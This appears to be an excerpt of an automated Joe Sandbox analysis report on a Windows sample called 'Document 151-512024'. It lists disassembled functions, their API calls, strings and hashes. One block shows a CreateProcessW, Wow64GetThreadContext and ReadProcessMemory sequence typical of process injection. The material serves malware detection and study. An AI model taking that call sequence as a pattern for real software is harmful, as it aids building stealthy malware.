                                                                                                    • Instruction Fuzzy Hash: D8C28675A00205CFCB24CFA8C891FADB7B5BF48310F248569E956AB3A1E375ED41CB91
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00960668
                                                                                                      • Part of subcall function 009632A4: RaiseException.KERNEL32(?,?,?,0096068A,?,00A11444,?,?,?,?,?,?,0096068A,00941129,00A08738,00941129), ref: 00963304
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00960685
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                    • String ID: Unknown exception
                                                                                                    • API String ID: 3476068407-410509341
                                                                                                    • Opcode ID: 267e4350ab804a237bcbcb6ed3a68dc2c970ed5a269a8841312068d6fbfe0363
                                                                                                    • Instruction ID: 64017aa44e974b4c7cbadbd8b5878a4784b9bbd8692d3f88795941ce54a278d9
                                                                                                    • Opcode Fuzzy Hash: 267e4350ab804a237bcbcb6ed3a68dc2c970ed5a269a8841312068d6fbfe0363
                                                                                                    • Instruction Fuzzy Hash: 44F0C23490030D77CB00FAA5ECA6E9E777C6EC0350B608932B924965D1EF71DA69C681
                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 009B302F
                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 009B3044
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Temp$FileNamePath
                                                                                                    • String ID: aut
                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                    • Opcode ID: 1cf401d1bd974c498a151254bbbeab1b5b2a4f0bc8f8cef6a9ef4ce9e4d3cd83
                                                                                                    • Instruction ID: 666c648808f7b04b69be16bdfdd89517639863fdc38fb98af0090eb045518035
                                                                                                    • Opcode Fuzzy Hash: 1cf401d1bd974c498a151254bbbeab1b5b2a4f0bc8f8cef6a9ef4ce9e4d3cd83
                                                                                                    • Instruction Fuzzy Hash: EBD05BB154531877DA20A794AC0DFC73B6CD704750F000652B755D30D5DAB0D584CAD0
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 009C82F5
                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 009C82FC
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 009C84DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 146820519-0
                                                                                                    • Opcode ID: 48a04c9740869c7bcfba951db35df14ebfe44820b313c353bcca9aae2d339bf0
                                                                                                    • Instruction ID: 61aa8eda9523a939c656726d76c566197bf11f93bd2e171602981b6132e1ce8a
                                                                                                    • Opcode Fuzzy Hash: 48a04c9740869c7bcfba951db35df14ebfe44820b313c353bcca9aae2d339bf0
                                                                                                    • Instruction Fuzzy Hash: A9125971A083419FC724DF28C484F6ABBE5BF89318F04895DE8998B352DB35E945CB92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1b12c8fb9225f886661e40f5ef627bd23462f4b7b7bd656a813e7846380e196f
                                                                                                    • Instruction ID: f407dc6782a936a7ba054c2d43b5e19fd6917fa1f76c9a0a9a5b84cee0d54723
                                                                                                    • Opcode Fuzzy Hash: 1b12c8fb9225f886661e40f5ef627bd23462f4b7b7bd656a813e7846380e196f
                                                                                                    • Instruction Fuzzy Hash: 6B51E472D006099FCB51EFA8C846FFE7BB8EF45310F1A8459F409A7291D7B59901CB61
                                                                                                    APIs
                                                                                                      • Part of subcall function 00941BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00941BF4
                                                                                                      • Part of subcall function 00941BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00941BFC
                                                                                                      • Part of subcall function 00941BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00941C07
                                                                                                      • Part of subcall function 00941BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00941C12
                                                                                                      • Part of subcall function 00941BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00941C1A
                                                                                                      • Part of subcall function 00941BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00941C22
                                                                                                      • Part of subcall function 00941B4A: RegisterWindowMessageW.USER32(00000004,?,009412C4), ref: 00941BA2
                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0094136A
                                                                                                    • OleInitialize.OLE32 ref: 00941388
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 009824AB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1986988660-0
                                                                                                    • Opcode ID: ccf194f99cc19b548703f6c9513b05a4a55ae797ac16340bc3a00f324bf1f3c4
                                                                                                    • Instruction ID: 5263f6cc11fb9be4e2c6000a26f41bb95555490f1d563f8310891dcdc914af0c
                                                                                                    • Opcode Fuzzy Hash: ccf194f99cc19b548703f6c9513b05a4a55ae797ac16340bc3a00f324bf1f3c4
                                                                                                    • Instruction Fuzzy Hash: 8671ABB89123018FC784DFF9A955AD53AE6FB887A4754C22AD64AC7361EB304483CF48
                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0094556D
                                                                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0094557D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: 56b49d9855f13cc8e98bb6831e1561a394b76b993f02739aebc4483dcf02bd09
                                                                                                    • Instruction ID: a24735163683c92d5fbd7ff22fd33efe21b5315da1be049c10f04d3d9042dd5d
                                                                                                    • Opcode Fuzzy Hash: 56b49d9855f13cc8e98bb6831e1561a394b76b993f02739aebc4483dcf02bd09
                                                                                                    • Instruction Fuzzy Hash: 49315A71A00609EFDB14CF68C880FA9B7B6FB48314F158629F91997241D770FE94CB90
                                                                                                    APIs
                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,009785CC,?,00A08CC8,0000000C), ref: 00978704
                                                                                                    • GetLastError.KERNEL32(?,009785CC,?,00A08CC8,0000000C), ref: 0097870E
                                                                                                    • __dosmaperr.LIBCMT ref: 00978739
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 490808831-0
                                                                                                    • Opcode ID: a6451f05eb1c7da85bf3c446a8881ce906b7f0257d0424f79398efccf81afffe
                                                                                                    • Instruction ID: 2ba3df635caf9ef2da63f7689796ee641c07176f0b0e2c6489fa7bd731757e9c
                                                                                                    • Opcode Fuzzy Hash: a6451f05eb1c7da85bf3c446a8881ce906b7f0257d0424f79398efccf81afffe
                                                                                                    • Instruction Fuzzy Hash: 7C012B33A8562076D6646274684EB7F674E4BC1774F3AC119F81C8B1E2DEE59C818150
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,009B2CD4,?,?,?,00000004,00000001), ref: 009B2FF2
                                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009B2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009B3006
                                                                                                    • CloseHandle.KERNEL32(00000000,?,009B2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009B300D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 3397143404-0
                                                                                                    • Opcode ID: 21e753967b50d3dfece88338890535981f62696c70573d69a196f0374515e485
                                                                                                    • Instruction ID: 6b2d4b7a35081e400ec07ab64da8c931a953a0d60f9eaeab2d1108ca8266e681
                                                                                                    • Opcode Fuzzy Hash: 21e753967b50d3dfece88338890535981f62696c70573d69a196f0374515e485
                                                                                                    • Instruction Fuzzy Hash: 24E086722D522177D6302755BC0DFCB3B1CDB86B71F104211F719751D086A0254192A8
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 009517F6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID: CALL
                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                    • Opcode ID: 8dc18d5c4cdf934ab7a3cd0510b25785832d7442be1f5f5bfdc118571a4935e3
                                                                                                    • Instruction ID: 7cde57d3fc28797fb3dd061c1ee35daf9a09433d1f56c9cbee191455530caf54
                                                                                                    • Opcode Fuzzy Hash: 8dc18d5c4cdf934ab7a3cd0510b25785832d7442be1f5f5bfdc118571a4935e3
                                                                                                    • Instruction Fuzzy Hash: 8222AC706083019FCB14DF29C491B2ABBF5BF89315F14891DF8968B3A2D775E949CB82
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 009B6F6B
                                                                                                      • Part of subcall function 00944ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944EFD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad_wcslen
                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                    • API String ID: 3312870042-2806939583
                                                                                                    • Opcode ID: e376b8e7393f2014589dd0a0a160ce43086fe0f1ecbd0b4b174f6b6b0658d059
                                                                                                    • Instruction ID: 2a6e5cec7db2372fbb50299694645aabb51a28cc86aa60e3555b1d0fcf499036
                                                                                                    • Opcode Fuzzy Hash: e376b8e7393f2014589dd0a0a160ce43086fe0f1ecbd0b4b174f6b6b0658d059
                                                                                                    • Instruction Fuzzy Hash: 80B16C715082018FCB14EF64C591EAEF7E5AFD5310F04895DF8969B2A2EB30ED49CB92
                                                                                                    APIs
                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 00982C8C
                                                                                                      • Part of subcall function 00943AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00943A97,?,?,00942E7F,?,?,?,00000000), ref: 00943AC2
                                                                                                      • Part of subcall function 00942DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00942DC4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                    • String ID: X
                                                                                                    • API String ID: 779396738-3081909835
                                                                                                    • Opcode ID: b8d1cb25360906f76afe3589e57ae28f8cc5f462f87520cf8df88f15de995198
                                                                                                    • Instruction ID: 4b3ed3f2c5e46c0f336f80f5a553f0f4223af8794d2608a2d5634a71af26cfb7
                                                                                                    • Opcode Fuzzy Hash: b8d1cb25360906f76afe3589e57ae28f8cc5f462f87520cf8df88f15de995198
                                                                                                    • Instruction Fuzzy Hash: 99219371A102589BCF01EF94D845BEE7BFCAF89314F008059F505A7281DBB85A89CF61
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fread_nolock
                                                                                                    • String ID: EA06
                                                                                                    • API String ID: 2638373210-3962188686
                                                                                                    • Opcode ID: 00fd136b784407fcc01f0a40b7025eb4295053b2640cc517a16ca2dc95fc0d96
                                                                                                    • Instruction ID: 88084a0e8f3681a1ce0d1f3d5e8e6b814f885005f1bb8dd54fc73be35ff7bfaf
                                                                                                    • Opcode Fuzzy Hash: 00fd136b784407fcc01f0a40b7025eb4295053b2640cc517a16ca2dc95fc0d96
                                                                                                    • Instruction Fuzzy Hash: 8201B1729042687EDF28C7A8CC56FEEBBF8DB45315F00459AF192D61C1E5B8E6088B60
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0094949C,?,00008000), ref: 00945773
                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0094949C,?,00008000), ref: 00984052
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: 84206a554aeb23d1445acd53ea254750d5acadad958b3c87dedc20bbf9abcccd
                                                                                                    • Instruction ID: 8bfbd0a5d9049ef99702ab3367b6e9ade85b28dc65820fa39f8ddc6c56cdcaf0
                                                                                                    • Opcode Fuzzy Hash: 84206a554aeb23d1445acd53ea254750d5acadad958b3c87dedc20bbf9abcccd
                                                                                                    • Instruction Fuzzy Hash: 92019230185225B7E3301A6ACC0EF977F98EF027B0F118311BA9C6A1E1C7B45854CB90
                                                                                                    APIs
                                                                                                    • __Init_thread_footer.LIBCMT ref: 0094BB4E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1385522511-0
                                                                                                    • Opcode ID: c4994efc57797a856c9b54d8bc8f478630cbabbf6aa11a38e375cd4df4781d37
                                                                                                    • Instruction ID: 06b351e657303a74a5992cac75d184ba6841900e76f1d6634f82ba1588abea99
                                                                                                    • Opcode Fuzzy Hash: c4994efc57797a856c9b54d8bc8f478630cbabbf6aa11a38e375cd4df4781d37
                                                                                                    • Instruction Fuzzy Hash: 6C32AA35A002099FDF24CF68C895FBEB7B9EF84314F148459E925AB261C778ED81CB91
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01BC1ABB
                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01BC1B51
                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01BC1B73
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 2438371351-0
                                                                                                    • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                    • Instruction ID: 97d29016b247bdb8e3a8bc42d09f234789f6ec8157ac1ab9276bb48f72e41e73
                                                                                                    • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                    • Instruction Fuzzy Hash: 1612ED24E24658C6EB24DF64D8507DEB232EF68300F1091ED910DEB7A5E77A4E81CF5A
                                                                                                    APIs
                                                                                                      • Part of subcall function 00944E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00944EDD,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944E9C
                                                                                                      • Part of subcall function 00944E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00944EAE
                                                                                                      • Part of subcall function 00944E90: FreeLibrary.KERNEL32(00000000,?,?,00944EDD,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944EC0
                                                                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944EFD
                                                                                                      • Part of subcall function 00944E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00983CDE,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944E62
                                                                                                      • Part of subcall function 00944E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00944E74
                                                                                                      • Part of subcall function 00944E59: FreeLibrary.KERNEL32(00000000,?,?,00983CDE,?,00A11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00944E87
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2632591731-0
                                                                                                    • Opcode ID: 9cab4115868ab2b9fa3454784a70f7e189f63d03aa486a20c192e32f9a4a8c76
                                                                                                    • Instruction ID: d127f938a90cbd9ff2075d949850fa7aeab01bb2b169bfa53ba5ceecc1a041c7
